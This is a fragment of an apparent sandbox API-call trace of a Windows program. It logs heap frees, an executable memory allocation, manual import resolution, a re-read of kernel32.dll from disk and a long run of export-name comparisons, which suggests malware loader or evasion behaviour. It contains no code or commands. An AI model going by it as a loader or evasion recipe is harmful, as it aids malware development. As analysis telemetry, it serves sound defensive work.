hHeap=0x400000, dwFlags=0x0, lpMem=0x2a8dd40 | out: hHeap=0x400000) returned 1 [0259.001] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2aa0f50 | out: hHeap=0x400000) returned 1 [0259.001] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2ab4160 | out: hHeap=0x400000) returned 1 [0259.001] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2ac7370 | out: hHeap=0x400000) returned 1 [0259.001] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2ada580 | out: hHeap=0x400000) returned 1 [0259.001] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2aed790 | out: hHeap=0x400000) returned 1 [0259.001] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2b009a0 | out: hHeap=0x400000) returned 1 [0259.001] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2b13bb0 | out: hHeap=0x400000) returned 1 [0259.106] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2b26dc0 | out: hHeap=0x400000) returned 1 [0259.106] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2b39fd0 | out: hHeap=0x400000) returned 1 [0259.106] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2b4d1e0 | out: hHeap=0x400000) returned 1 [0259.106] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2b603f0 | out: hHeap=0x400000) returned 1 [0259.106] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2b73600 | out: hHeap=0x400000) returned 1 [0259.106] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2b86810 | out: hHeap=0x400000) returned 1 [0259.112] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2b99a20 | out: hHeap=0x400000) returned 1 [0259.114] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2bacc30 | out: hHeap=0x400000) returned 1 [0259.114] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2bbfe40 | out: hHeap=0x400000) returned 1 [0259.114] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2bd3050 | out: hHeap=0x400000) returned 1 [0259.114] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2be6260 | out: hHeap=0x400000) returned 1 [0259.118] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2bf9470 | out: hHeap=0x400000) returned 1 [0259.119] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2c0c680 | out: hHeap=0x400000) returned 1 [0259.119] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2c1f890 | out: hHeap=0x400000) returned 1 [0259.131] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2c32aa0 | out: hHeap=0x400000) returned 1 [0259.131] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2c45cb0 | out: hHeap=0x400000) returned 1 [0259.131] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2c58ec0 | out: hHeap=0x400000) returned 1 [0259.131] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2c6c0d0 | out: hHeap=0x400000) returned 1 [0259.131] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2c7f2e0 | out: hHeap=0x400000) returned 1 [0259.134] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2c924f0 | out: hHeap=0x400000) returned 1 [0259.135] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2ca5700 | out: hHeap=0x400000) returned 1 [0259.135] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2cb8910 | out: hHeap=0x400000) returned 1 [0259.135] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2ce0080 | out: hHeap=0x400000) returned 1 [0259.135] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2cf3290 | out: hHeap=0x400000) returned 1 [0259.135] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2d064a0 | out: hHeap=0x400000) returned 1 [0259.135] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2d196b0 | out: hHeap=0x400000) returned 1 [0259.135] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2d2c8c0 | out: hHeap=0x400000) returned 1 [0259.136] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2d3fad0 | out: hHeap=0x400000) returned 1 [0259.136] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2d52ce0 | out: hHeap=0x400000) returned 1 [0259.136] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2d65ef0 | out: hHeap=0x400000) returned 1 [0259.136] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2d79100 | out: hHeap=0x400000) returned 1 [0259.143] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2d8c310 | out: hHeap=0x400000) returned 1 [0259.145] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2d9f520 | out: hHeap=0x400000) returned 1 [0259.145] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2db2730 | out: hHeap=0x400000) returned 1 [0259.145] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2dc5940 | out: hHeap=0x400000) returned 1 [0259.145] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2dd8b50 | out: hHeap=0x400000) returned 1 [0259.246] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2debd60 | out: hHeap=0x400000) returned 1 [0259.247] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2dfef70 | out: hHeap=0x400000) returned 1 [0259.247] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2e12180 | out: hHeap=0x400000) returned 1 [0259.247] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2e25390 | out: hHeap=0x400000) returned 1 [0259.247] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2e385a0 | out: hHeap=0x400000) returned 1 [0259.247] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2e4b7b0 | out: hHeap=0x400000) returned 1 [0259.249] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2e5e9c0 | out: hHeap=0x400000) returned 1 [0259.250] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2e71bd0 | out: hHeap=0x400000) returned 1 [0259.250] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2e84de0 | out: hHeap=0x400000) returned 1 [0259.250] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2e97ff0 | out: hHeap=0x400000) returned 1 [0259.250] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2eab200 | out: hHeap=0x400000) returned 1 [0259.250] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2ebe410 | out: hHeap=0x400000) returned 1 [0259.250] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2ed1620 | out: hHeap=0x400000) returned 1 [0259.250] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2ee4830 | out: hHeap=0x400000) returned 1 [0259.255] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2ef7a40 | out: hHeap=0x400000) returned 1 [0259.255] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2f0ac50 | out: hHeap=0x400000) returned 1 [0259.256] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2f1de60 | out: hHeap=0x400000) returned 1 [0259.256] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2f31070 | out: hHeap=0x400000) returned 1 [0259.256] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2f44280 | out: hHeap=0x400000) returned 1 [0259.256] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2f57490 | out: hHeap=0x400000) returned 1 [0259.256] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2f6a6a0 | out: hHeap=0x400000) returned 1 [0259.256] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2f7d8b0 | out: hHeap=0x400000) returned 1 [0259.256] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2f90ac0 | out: hHeap=0x400000) returned 1 [0259.256] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2fa3cd0 | out: hHeap=0x400000) returned 1 [0259.256] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2fb6ee0 | out: hHeap=0x400000) returned 1 [0259.256] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2fca0f0 | out: hHeap=0x400000) returned 1 [0259.261] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2fdd300 | out: hHeap=0x400000) returned 1 [0259.263] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2ff0510 | out: hHeap=0x400000) returned 1 [0259.266] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x3003720 | out: hHeap=0x400000) returned 1 [0259.910] VirtualAlloc (lpAddress=0x180000000, dwSize=0x19000, flAllocationType=0x3000, flProtect=0x40) returned 0x180000000 [0259.913] VirtualProtect (in: lpAddress=0x1800122e0, dwSize=0xc8, flNewProtect=0x4, lpflOldProtect=0x14f750 | out: lpflOldProtect=0x14f750*=0x40) returned 1 [0259.914] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x7ffc5ecd0000 [0259.914] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ExitProcess") returned 0x7ffc5ecf4d80 [0259.914] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0259.915] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0259.915] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcessHeap") returned 0x7ffc5eced4f0 [0259.915] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapAlloc") returned 0x7ffc5f8352d0 [0259.915] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapFree") returned 0x7ffc5eceb480 [0259.915] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapReAlloc") returned 0x7ffc5f8339f0 [0259.915] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatA") returned 0x7ffc5ecf6bb0 [0259.916] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatW") returned 0x7ffc5ecfa250 [0259.916] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcmpA") returned 0x7ffc5ecf3690 [0259.916] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyA") returned 0x7ffc5ecf45d0 [0259.916] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyW") returned 0x7ffc5ecf6d30 [0259.916] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpynW") returned 0x7ffc5ecf91a0 [0259.916] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenA") returned 0x7ffc5ecf0c60 [0259.916] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenW") returned 0x7ffc5eced6d0 [0259.916] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x7ffc5e960000 [0259.917] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfA") returned 0x7ffc5e984d50 [0259.917] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfW") returned 0x7ffc5e9881e0 [0259.917] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x7ffc5e7b0000 [0259.917] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnA") returned 0x7ffc5e7c5b00 [0259.917] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnW") returned 0x7ffc5e7bd780 [0259.917] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrDupA") returned 0x7ffc5e7c5c30 [0259.917] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnA") returned 0x7ffc5e7c5ca0 [0259.918] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnW") returned 0x7ffc5e7c5cb0 [0259.918] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x42db40 | out: hHeap=0x400000) returned 1 [0259.918] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x44d940 | out: hHeap=0x400000) returned 1 [0259.926] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x4109f0 | out: hHeap=0x400000) returned 1 [0260.049] GetModuleHandleA (lpModuleName="NTDLL.dll") returned 0x7ffc5f810000 [0260.050] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnprintf") returned 0x7ffc5f8a6970 [0260.050] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnwprintf") returned 0x7ffc5f8a6a40 [0260.050] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memset") returned 0x7ffc5f8bb580 [0260.050] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memcpy") returned 0x7ffc5f8bb240 [0260.050] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memmove") returned 0x7ffc5f8bb240 [0260.053] GetProcessHeap () returned 0x400000 [0260.053] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x68) returned 0x408d80 [0260.054] GetProcessHeap () returned 0x400000 [0260.054] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x10) returned 0x419280 [0260.055] GetProcessHeap () returned 0x400000 [0260.055] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x48) returned 0x410090 [0260.055] GetModuleHandleA (lpModuleName="Kernel32.dll") returned 0x7ffc5ecd0000 [0260.055] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0260.055] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryW") returned 0x7ffc5ecf50f0 [0260.056] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryA") returned 0x7ffc5ecf74d0 [0260.056] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="FreeLibrary") returned 0x7ffc5ecf4810 [0260.056] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleW") returned 0x7ffc5ecf3d40 [0260.056] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0260.056] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x7ffc5ecd0000 [0260.056] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0260.056] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0260.056] GetModuleFileNameA (in: hModule=0x7ffc5ecd0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0260.056] CreateFileA (lpFileName="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0260.057] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0260.057] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0260.057] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=705584) returned 1 [0260.058] GetProcessHeap () returned 0x400000 [0260.058] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0xac430) returned 0x42c5f0 [0260.060] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0260.060] ReadFile (in: hFile=0x134, lpBuffer=0x42c5f0, nNumberOfBytesToRead=0xac430, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x42c5f0*, lpNumberOfBytesRead=0x14f5a4*=0xac430, lpOverlapped=0x0) returned 1 [0260.077] CloseHandle (hObject=0x134) returned 1 [0260.078] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0260.084] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockShared") returned 1 [0260.085] lstrcmpA (lpString1="ActivateActCtx", lpString2="ActivateActCtx") returned 0 [0260.085] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0260.085] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0260.085] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtx") returned 1 [0260.085] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtxWorker") returned 0 [0260.085] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockExclusive") returned 1 [0260.085] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockShared") returned 1 [0260.085] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtx") returned 1 [0260.085] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtxWorker") returned 1 [0260.085] lstrcmpA (lpString1="AddAtomA", lpString2="AddAtomA") returned 0 [0260.085] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockExclusive") returned 1 [0260.085] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockShared") returned 1 [0260.085] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtx") returned 1 [0260.085] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtxWorker") returned 1 [0260.085] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomA") returned 1 [0260.085] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomW") returned 0 [0260.085] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockExclusive") returned 1 [0260.085] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockShared") returned 1 [0260.085] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtx") returned 1 [0260.085] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtxWorker") returned 1 [0260.086] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomA") returned 1 [0260.086] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomW") returned 1 [0260.086] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddConsoleAliasA") returned 0 [0260.086] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockExclusive") returned 1 [0260.086] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockShared") returned 1 [0260.086] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtx") returned 1 [0260.086] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtxWorker") returned 1 [0260.086] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomA") returned 1 [0260.086] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomW") returned 1 [0260.086] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasA") returned 1 [0260.086] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasW") returned 0 [0260.086] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0260.086] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0260.086] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0260.086] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0260.086] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0260.086] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0260.086] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0260.086] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0260.086] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0260.086] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 0 [0260.087] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockExclusive") returned 1 [0260.087] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockShared") returned 1 [0260.087] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtx") returned 1 [0260.087] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtxWorker") returned 1 [0260.087] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomA") returned 1 [0260.087] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomW") returned 1 [0260.087] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasA") returned 1 [0260.087] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasW") returned 1 [0260.087] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddDllDirectory") returned 1 [0260.087] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0260.087] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddLocalAlternateComputerNameA") returned 0 [0260.087] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockExclusive") returned 1 [0260.087] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockShared") returned 1 [0260.087] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtx") returned 1 [0260.087] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtxWorker") returned 1 [0260.087] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomA") returned 1 [0260.087] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomW") returned 1 [0260.087] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasA") returned 1 [0260.087] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasW") returned 1 [0260.088] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddDllDirectory") returned 1 [0260.088] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0260.088] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameA") returned 1 [0260.088] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameW") returned 0 [0260.088] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0260.088] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockShared") returned 1 [0260.088] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtx") returned 1 [0260.088] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtxWorker") returned 1 [0260.088] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomA") returned 1 [0260.088] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomW") returned 1 [0260.088] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasA") returned 1 [0260.088] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasW") returned 1 [0260.088] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddDllDirectory") returned 1 [0260.088] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0260.088] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameA") returned 1 [0260.088] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameW") returned 1 [0260.088] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddRefActCtx") returned 0 [0260.089] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0260.089] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0260.089] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtx") returned 1 [0260.089] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtxWorker") returned 1 [0260.089] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomA") returned 1 [0260.089] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomW") returned 1 [0260.089] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasA") returned 1 [0260.089] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasW") returned 1 [0260.089] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddDllDirectory") returned 1 [0260.089] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0260.089] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameA") returned 1 [0260.089] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameW") returned 1 [0260.089] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtx") returned 1 [0260.089] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtxWorker") returned 0 [0260.089] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockExclusive") returned 1 [0260.089] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockShared") returned 1 [0260.089] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtx") returned 1 [0260.089] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtxWorker") returned 1 [0260.089] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomA") returned 1 [0260.089] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomW") returned 1 [0260.089] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasA") returned 1 [0260.089] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasW") returned 1 [0260.089] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddDllDirectory") returned 1 [0260.089] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0260.090] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0260.090] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0260.090] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtx") returned 1 [0260.090] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtxWorker") returned 1 [0260.090] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddResourceAttributeAce") returned 0 [0260.090] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0260.090] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0260.090] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0260.090] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0260.090] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0260.090] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0260.090] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0260.090] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0260.090] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0260.090] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0260.090] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameA") returned 1 [0260.090] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameW") returned 1 [0260.090] 